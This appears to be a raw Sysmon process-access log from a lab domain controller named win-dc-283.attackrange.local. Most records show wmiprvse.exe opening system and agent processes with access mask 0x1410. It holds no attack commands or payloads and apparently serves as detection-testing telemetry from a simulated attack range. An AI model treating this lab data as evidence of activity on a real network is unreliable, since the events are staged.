15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022379Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022378Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022377Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022376Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022375Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022374Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022373Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022372Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022371Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022370Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022369Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022368Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022367Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022366Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022365Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022364Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022363Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022362Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022361Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022360Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 